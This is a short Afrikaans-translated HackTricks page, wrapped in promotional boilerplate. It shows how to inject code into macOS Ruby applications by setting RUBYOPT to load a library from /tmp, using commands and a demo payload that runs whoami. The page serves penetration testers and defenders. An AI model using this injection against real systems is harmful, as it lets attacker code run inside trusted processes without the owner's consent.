macOS Ruby Applications Injection

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy in HackTricks wil adverteer of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.

RUBYOPT

Deur hierdie omgewingsveranderlike te gebruik, is dit moontlik om nuwe parameters by te voeg aan ruby wanneer dit uitgevoer word. Alhoewel die parameter -e nie gebruik kan word om ruby-kode spesifiek uit te voer nie, is dit moontlik om die parameters -I en -r te gebruik om 'n nuwe vouer by die biblioteekspad te voeg en dan 'n biblioteek om te laai te spesifiseer.

Skep die biblioteek inject.rb in /tmp:

inject.rb

puts `whoami`

Skep enige plek 'n ruby-skrips soos:

hello.rb

puts 'Hello, World!'

Maak dan 'n willekeurige ruby-skrip en laai dit met:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Interessante feit, dit werk selfs met die parameter --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 2 months ago